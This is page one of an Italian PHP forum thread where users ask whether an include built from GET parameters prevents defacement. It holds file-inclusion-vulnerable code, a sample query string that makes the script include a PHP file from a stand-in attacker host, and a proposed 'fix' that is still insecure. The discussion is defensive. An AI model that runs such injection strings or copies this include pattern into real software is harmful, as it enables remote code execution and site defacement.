Pagina 1 di 2 1 2 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 13
  1. #1

    parere su controllo antidefacement

    c'era un thread ma è stato chiuso... riprendo il discorso per chiedervi se può andar bene un controllo di questo tipo

    Codice PHP:
    <?php
    include 'su.php';
    include 
    'sx.php';
    $pagina 'centro.php';
    if (isset(
    $_GET['pagina']) && isset($_GET['sezione']))
    {
        
    $pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php';
    }
    if (!
    file_exists ($pagina))
    {
            
    $pagina 'errore.php';
    }
    include 
    $pagina;
    include 
    'giu.php';
    ?>
    Sotto la panza la mazza avanza.

  2. #2
    Codice PHP:
    if (isset($_GET['pagina']) && isset($_GET['sezione']))

    {

        
    $pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php';

    Visot che hai '/inc_' in mezzo.. anche modificando la querystring non possono includere nulla che non abbia "inc_" ... quindi è abbastanza sicuro


  3. #3
    Direi di si, in ogni caso la variabile che prendi via GET sarà solo "un pezzo" della pagina che andrai ad includere
    Addio Aldo, amico mio... [03/12/70 - 16/08/03]

  4. #4
    ok mi sento in una botte de fero... l'indirizzo risultante passando una pagina esterna è sempre una cosa del tipo directory/inc_http://link.dominio

    grazie a fabio heller per l'idea
    Sotto la panza la mazza avanza.

  5. #5

    Re: parere su controllo antidefacement

    Codice PHP:
    $pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php'
    A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.

    Quindi con
    http://www.sitobastardo.com/inc_defacciamitutto.php

    basta chiamare
    tuoscript.php?pagina=defacciamitutto&sezione=http://www.sitobastardo.com

    Almeno così mi sembra, se non mi sto rincoglionendo del tutto

    Per stare sicuro, nella variabile $pagina, prima di sezione, puoi metterci l'url del tuo sito.

  6. #6
    [supersaibal]Originariamente inviato da Caleb
    ok mi sento in una botte de fero... l'indirizzo risultante passando una pagina esterna è sempre una cosa del tipo directory/inc_http://link.dominio

    grazie a fabio heller per l'idea [/supersaibal]
    Prendi in considerazione anche il metodo suggerito da M4rko

    http://forum.html.it/forum/showthrea...=2#post7272352


    Il silenzio è spesso la cosa migliore. Pensa ... è gratis.

  7. #7

    Re: Re: parere su controllo antidefacement

    [supersaibal]Originariamente inviato da skidx
    Codice PHP:
    $pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php'
    A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.
    [/supersaibal]
    hai ragione.. crosssite... non ci avevo pensato!

    Ecco... un ottimo esempio di una cosa che si dice sempre: non bisogna pensare a cosa impedire, ma a cosa consentire.. ed essere il più restrittivi possibili

  8. #8
    [supersaibal]Originariamente inviato da piero.mac
    Prendi in considerazione anche il metodo suggerito da M4rko

    http://forum.html.it/forum/showthrea...=2#post7272352

    [/supersaibal]
    Giusto per dare a cesare quel che è di cesare: mi pare fosse stato suggerito da daniele_dll originariamente.. un annetto fa più o meno

    stavo per suggerirlo io nella prima risposta... poi mi sono fatto trarre in inganno dalla apparente sicurezza del codice di Caleb... vedi discorso appena fatto nel post precedente

  9. #9
    [supersaibal]Originariamente inviato da }gu|do[z]{®©
    Giusto per dare a cesare quel che è di cesare: mi pare fosse stato suggerito da daniele_dll originariamente.. un annetto fa più o meno

    stavo per suggerirlo io nella prima risposta... poi mi sono fatto trarre in inganno dalla apparente sicurezza del codice di Caleb... vedi discorso appena fatto nel post precedente [/supersaibal]
    Concordo che daniele possa averlo detto, ma chi lo ha ricordato e' M4rko. Non e' come in botanica dove il primo che attribuisce un nome quello sara' per sempre e deve essere citato, ed e' comunque l'invenzione dell'acqua calda ....

    D'altro canto la lista dei file abilitati all'uso messa su db, pure se per ragioni diverse dal defacement, la ricordo in script ripresi da un manualetto della McGraw-Ill editato nel 2002.

    Personalmente l'utilizzo abbastanza di frequente il db per validare dei redirect a seconda del file citato nell'url, nome che non e' mai completo e che spesso e' un alias di quello vero, proprio perche' in Intranet l'utente e' di parecchio facilitato ad azioni di uso improprio dei mezzi disponibili rispetto ad un utente "esterno".

    file_exists, prima del php5 che ben pochi hanno, lavorava esclusivamente su file system locale, se non erro.

    http://it.php.net/manual/it/wrappers.php


    Il silenzio è spesso la cosa migliore. Pensa ... è gratis.

  10. #10

    Re: Re: parere su controllo antidefacement

    [supersaibal]Originariamente inviato da skidx
    Codice PHP:
    $pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php'
    A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.

    Quindi con
    http://www.sitobastardo.com/inc_defacciamitutto.php

    basta chiamare
    tuoscript.php?pagina=defacciamitutto&sezione=http://www.sitobastardo.com

    Almeno così mi sembra, se non mi sto rincoglionendo del tutto

    Per stare sicuro, nella variabile $pagina, prima di sezione, puoi metterci l'url del tuo sito. [/supersaibal]
    'inchia e chi se ne era accorto? azz

    così?

    Codice PHP:
    <?php
    include 'su.php';
    include 
    'sx.php';
    $pagina 'centro.php';
    if (isset(
    $_GET['pagina']) && isset($_GET['sezione']))
    {
        
    $pagina $_GET['sezione'] . '/inc_' $_GET['pagina'] . '.php';
    }
    if (!
    file_exists ($pagina))
    {
            
    $pagina 'errore.php';
    }
    $pagina "http://nomesito/" $pagina;
    include 
    $pagina;
    include 
    'giu.php';
    ?>
    Sotto la panza la mazza avanza.

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.